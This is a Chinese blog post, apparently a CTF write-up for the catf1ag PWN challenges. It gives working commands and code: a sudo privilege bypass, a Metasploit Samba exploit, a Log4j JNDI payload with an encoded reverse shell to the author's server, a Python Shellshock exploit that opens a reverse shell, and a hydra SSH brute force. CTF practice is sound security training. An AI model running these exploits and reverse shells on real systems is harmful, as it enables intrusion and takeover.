catf1ag PWN/Attack题解(正在更新)

最新推荐文章于 2024-04-05 05:44:52 发布
最新推荐文章于 2024-04-05 05:44:52 发布
阅读量1.8k 收藏 3
点赞数 4
分类专栏: ctf 文章标签: linux bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42880719/article/details/122112267
版权

写着玩。请勿破坏题目环境

easy_cat_flag

直接ssh链接就行了

easy_pwn_su

ssh连上去之后发现没有权限,然后发现有个readme.md
cat一下发现了指令,然后就行了
这是CVE-2019-14287
使用指令sudo -u#-1 bash

easy_smb

CVE-2017-7494。linux版的永恒之蓝。通过利用smb上的反弹shell漏洞,进行远程代码执行
打开你的kali,输入msfconsole
然后use exploit/linux/samba/is_known_pipename
在这里插入图片描述
接着设置set rhosts ctf.vfree.ltd
set rport 10003
使用show options查看设置
在这里插入图片描述

最后再输入run即可获取权限

log4j_RCE

反弹shell
这里用的是JNDI-Injection-Exploit
首先将jar文件上传至自己的vps
然后vps打开两个终端,一个运行这个jar文件,一个用来监听

首先对bash -i >& /dev/tcp/IP/12345 0>&1进行base64加密
如vps的ip为114.114.114.114,则base之后为YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTE0LjExNC4xMTQvMTIzNDUgMD4mMQ==

则输入

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTE0LjExNC4xMTQvMTIzNDUgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "114.114.114.114"

在这里插入图片描述
然后在另一个终端输入nc -lnvp 12345
看红框,这里给出了payload,等会就用这个

题目说对User-agent疯狂输出
在这里插入图片描述
payload就是对UA输入

${jndi:rmi://IP:1099/给出的随机字符串}

然后就连上了
在这里插入图片描述

easy_shellshock

CVE-2014-6271
可以看看这篇的讲解什么是shellshock攻击
这里直接用百度到的脚本就打通了
首先在vps上nc -lvvp 666再运行脚本
脚本用法是python .\ty.py http://ctf.vfree.ltd:10006/cgi-bin/shell

import urllib, httplib
import sys, re, urlparse


# author:nx4dm1n
# website:http://www.nxadmin.com

def bash_exp(url):
    urlsp = urlparse.urlparse(url)
    hostname = urlsp.netloc
    urlpath = urlsp.path
    conn = httplib.HTTPConnection(hostname)
    headers={"User-Agent":"() { :;}; /bin/sh >& /dev/tcp/你VPS的IP/666 0<&1 2>&1"}
    conn.request("GET", urlpath, headers=headers)
    res = conn.getresponse()
    res = res.getheaders()
    for passwdstr in res:
        print(passwdstr[0] + ':' + passwdstr[1])


if __name__ == '__main__':

    if len(sys.argv) < 2:
        print("Usage: " + sys.argv[0] + " http://192.168.10.46:8080/cgi-bin/aa.sh")
        sys.exit()
    else:
        bash_exp(sys.argv[1])

在这里插入图片描述

easy_burst

简单,直接hydra爆破就完事,我用rockyou

hydra -l catflag_user -P ./rockyou.txt -t 6 -s 10002 ssh://ctf.vfree.ltd

在这里插入图片描述

有了账号密码然后ssh连上去就完事

是Mumuzi
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
天权信安杯 catf1ag CTF 2022 题目
12-09
天权信安杯 catf1ag CTF 2022 题目。除了Web,其他类型的题目基本上都下载了。
25分钟了解命令执行漏洞【例题+详细讲解】(一)
贤鱼的博客
09-11 2711
一文初入命令执行漏洞
cat flag
lastwinn的博客
08-01 949
cat flag <?php ​ if (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; if (!preg_match('/flag/i',$cmd)) { $cmd = escapeshellarg($cmd); system('cat ' . $cmd); } } else { highlight_file(__FILE__); } ?> 题目给了一点点代码,对cmd参...
catf1ag Web writeup(wp) 可能会持续更新
mumuzi的博客
01-14 3452
catf1ag web水文
cat-flag解析
weixin_43404314的博客
04-19 3121
点开图片,发现是由两种不同的猫咪组成的,尝试用WinHex解析,发现没有用,看了其他正确解析,才知道其实是二进制转字符,将其转化成二进制SACII码进行解码即可得flag 二进制转字符可参考https://baike.sogou.com/v57727847.htm?fromTitle=%E4%BA%8C%E8%BF%9B%E5%88%B6ASCII%E7%A0%81 ...
catf1ag平台 友谊杯
weixin_53268624的博客
07-14 1104
catf1ag平台友谊杯
CatF MT4指标模板
09-28
1. **趋势追踪指标**:这类指标通常用于识别市场的总体方向,例如移动平均线(MA)、抛物转向指标(PSAR)或趋势线。在CatF模板中,它们可能被用来确认长期和短期的趋势,以便在正确的时机开立头寸。 2. **振荡器...
xctf攻防世界 MISC之CatFlag
l8947943的博客
09-06 7398
拿到的是一个无后缀的flag文件,用winhex打开后发现是奇奇怪怪的乱码,用kali的strings搜索也没找到flag情况。
catflag-web-wp部分(填坑)
开心星人的博客
03-25 4846
目录web签到题webshell命令执行之我在哪int命令执行《我的女友是机器人》变量覆盖_extract等于False文件包含strcmp什么?有后门命令执行之我是谁小矛盾命令执行之我在干什么 web签到题 进入页面,一片空白,查看源码 webshell 源码,状态包什么都看了,没找到 啥都没了,猜猜应该是目录扫描 扫一下 webshe11.php是白板,查看源码得到 解码得到hacker 应该是一句话木马的密码 cat看一下,没有找着(可以直接用菜刀连) 查看根目录 有了 命令执行之我在哪
catf1ag Web中命令执行与Webshell详解
Aiwin的博客
05-10 1198
关于catflag平台中Webshell与无字符Webshell做题的记录
catflag套神的传人
zip471642048的博客
12-18 1319
题目是一个套了400多层的压缩包,仔细观察就可以发现压缩包的名称是16进制,我们先使用脚本把压缩包递归解压。 import zipfile import os file_path = input('path : ')#压缩包路径 path = file_path[0:len(file_path)-len(file_path.split('\\')[-1])] n = 0 s2 = "" #"C:\Users\63606\Desktop\CTF\CTF\VFree\MISC\secret\272B3B797
CatFlag
qq_53229503的博客
01-31 1337
本题方向为Misc——GFSJ1208,难度偏简单 来源地址:攻防世界(https://adworld.xctf.org.cn/challenges/list)
catf1ag web题目 WriteUp(wp)
Anton1a的博客
01-16 7706
catf1ag web题目 WriteUp
【攻防世界misc】CatFlag
ncnfjdjjd的博客
01-22 1064
光标移动
CTF命令执行的常见姿势
weixin_40103894的博客
09-28 1520
1.**cat fl[abc]g.php ** //匹配[abc]中的任何一个。11.**vi **–使用vi打开文本cat 由第一行开始显示内容,并将所有内容输出。1.**wh\o\ami ** //反斜线绕过。3.**cat fla* ** //用*匹配任意。3.**whoa’m’i ** //单引号绕过。4.**whoam``i ** //反引号绕过。8.**nl **–类似于cat -n,显示时输出行号。
catf1ag平台AK赛
weixin_53268624的博客
05-10 897
catf1ag AK赛wp
绕过之cat|/ flag
m0_61011147的博客
09-06 1998
绕过之cat|/ flag
helloword catflag逆向
weixin_53268624的博客
03-12 3597
class 下载后得到 用Java写的 且是.class后缀文件 用Java反编译工具Java Decompiler 下载地址:Java Decompiler (java-decompiler.github.io) 需要配置java环境 没配置的可以看这篇博客Java 开发环境配置_w3cschool easypython 下载后得到一个exe文件 反编译工具:pyinstxtractor.py 下载地址:https://nchc.dl.sourceforge.net/p...
Catf1agCTF-Web通关合集,网络安全高级工程师必备知识
最新发布
m0_56169789的博客
04-05 679
?
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值